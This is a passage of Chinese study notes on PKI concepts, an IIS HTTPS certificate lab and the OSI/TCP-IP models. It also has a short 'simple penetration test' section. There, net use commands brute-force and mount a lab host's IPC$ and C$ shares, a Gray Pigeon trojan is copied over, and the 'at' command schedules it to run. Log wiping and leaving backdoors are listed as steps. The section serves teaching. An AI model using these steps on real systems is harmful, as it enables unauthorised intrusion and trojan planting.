PKI+简单渗透测试随记

PKI


一、 PKI概述

1、名称
Public Key Infrastructure:公钥基础设施
2、作用
通过加密技术和数字签名保证信息的安全
3、组成
公钥加密技术、数字证书、CA、RA

二、信息安全三要素

机密性
完整性
身份验证/操作的不可否认性

三、哪些IT领域用到PKI:

1、SSL/HTTPS
2、IPsecVPN
3、部分远程访问VPN

四、公钥加密技术

1、作用:实现对信息加密、数字签名等安全保障
2、加密算法:

(1)对称加密算法
​ 加解密的密钥一致!
​ DES 3DES AES

(2)非对称加密算法

通信双方各自产生一对公私钥。
双方各自交换公钥
公钥和私钥为互相加解密关系!
公私钥不可互相逆推!
RSA DH

(3)例如

x+5=y(对称加密算法)

x是原数据/原文
y是密文
5是key/密钥

(4)HASH算法:MD5 SHA (验证完整性)

HASH值不可逆!
HASH值=摘要

(5)数字签名:

用自己的私钥对摘要加密得出的密文就是数字签名

(6)证书:

①证书用于保证公密的合法性
②证书格式遵循X.509标准
③数字证书包含信息:

使用者的公钥值
使用者标识信息(如名称和电子邮件地址)
有效期(证书的有效时间)
颁发者标识信息
颁发者的数字签名

④数字证书由权威公正的第三方机构即CA签发

⑤CA是权威证书颁发机构,为了公正“公钥”的合法性!
⑥机密性:使用对方的公钥加密!
⑦身份验证/数字签名:使用自己的私钥!

五、实验

1、实验名称:部署HTTPS服务器,也叫SSL服务器

2、实验环境:

1)win2008作为https服务器:10.1.1.2/24
2)win7作为客户机:10.1.1.1/24
3)桥接到虚拟网络vmenet1

3、实验步骤:

(1)配置服务器IP地址10.1.1.2/24。

(2)安装IIS服务 并建立一个站点。(必须使用域名)并配置DNS服务器,并初步验证访问http://www.flower.com一下。

(3)安装CA组件

(4)打开IIS,先生成证书申请文件

(5)向CA申请证书:

打开网页http://10.1.1.2/certsrv并向CA发送web服务器申请文件

(6)CA颁发证书

(7)在web服务器上下载证书并完成安装

(8)在web服务器上启用SSL443

(9)要求用户必须使用443访问,不能使用80访问!
(10)在客户端上修改hosts文件,并验证

渗透简单测试


一、步骤

0.授权

1.信息收集

nslookup whois

2.扫描漏洞

namp=ip范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0
扫描网站漏洞

3.漏洞利用

4.提权(shell环境、桌面环境、最高权限)

5.毁尸灭迹(自首)

6.留后门(跟狱友搞好关系)

7.渗透测试报告(努力立功,争取减刑出狱)

二、手工探测端口号开放

格式:telnet IP地址 探测端口

1.使用 scanport 软件 扫描445端口

2.漏洞利用之IPC$:

进行暴力破解:NTscan(只能针对445端口进行暴力破解)

3.命令

命令:net use \\10.1.1.2\ipc$ 密码 /user:用户名
作用:建立空链接,控制整个电脑的文件,ipc$ 不针对某一个盘,链接之后,目标主机的所有的盘都能在本机使用

net use f: \ \10.1.1.2\share 密码 /user:用户名
作用:将 10.1.1.2\share 共享文件夹映射到本机的 f 盘

net use f: /del
作用:删掉本地的 f 盘映射

net use * /del
作用:删掉所有映射

net use f: \ \10.1.1.2\c$ 密码 /user:用户名
作用:将 10.1.1.2 的 C盘 映射为本机的 f 盘

4.制作木马
利用光盘上的灰鸽子软件

5.植入木马(留后门)

copy d:\heihei.exe \10.1.1.2\c$
作用:将本机的 d:\heihei.exe 拷贝到 10.1.1.2 的 c 盘下

6.设置计划任务自动执行木马

命令:net time \\10.1.1.2
作用:查看对方电脑时间

命令:at \\10.1.1.2 11:11 “c:\heihei.exe”
作用:在对方电脑上定时启动指定应用程序

7.等待肉鸡上线

OSI与TCP-IP5层协议


一、分层思想

1、由通信需求而产生了定义协议标准
2、分层思想的概念

将复杂的流程分解为几个功能相对单一的子过程(将复杂问题简单化)

整个流程更加清晰,复杂问题简单化
更容易发现问题并针对性的解决问题

使用网络的人未必知道数据的传输过程

3、OSI七层模型

(1)通信

(2)协议:通信的双方需要“讲”相同的语言

(3)协议分层:网络通信的过程是开放很复杂的,为通信系了降低复统互联杂性参考

(4)OSI七层模型:1974年,ISO组织发布了OSI参考模型

OSI(Open System interconnection):是开放的通信系统互联参考模型

(5)特点:同层使用相同协议,下层为上层提供服务

二、数据的封装与解封装过程

TCP/UDP 头:包含了源端口号和目标端口号

IP 包头:包含了源IP和目标IP

注:端口号只有应用层才有。

传输层:完成进程到进程的通信

UDP特点:速度快,安全性低,无连接服务

TCP特点:速度慢,安全性高,提供可靠的数据传输(与对方建立连接)

网络层:完成点(电脑)到点(电脑)的通信

交换机工作在数据链路层,而交换机一般不认识IP地址,所以需要加MAC子层,其中包含两个重要的值:源MAC地址和目标MAC地址,这俩值主要就是给交换机看的

FCS:检验前面的数据是否有改变和丢失,是一种校验手段,4个字节

三、OSI模型和TCP/IP模型

7层模型中的 表示层和会话层的协议比较少,直接并到应用层了,就成了 5层模型。
网络层有个非常重要的协议叫 IP 协议。
传输层有个非常重要的协议叫 TCP 协议

数据封装示意图:

8bit = 1Byte字节
注:凡是跟厂家有关系的,都是按照 bit 算的,只有电脑是按照Byte算的。

  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值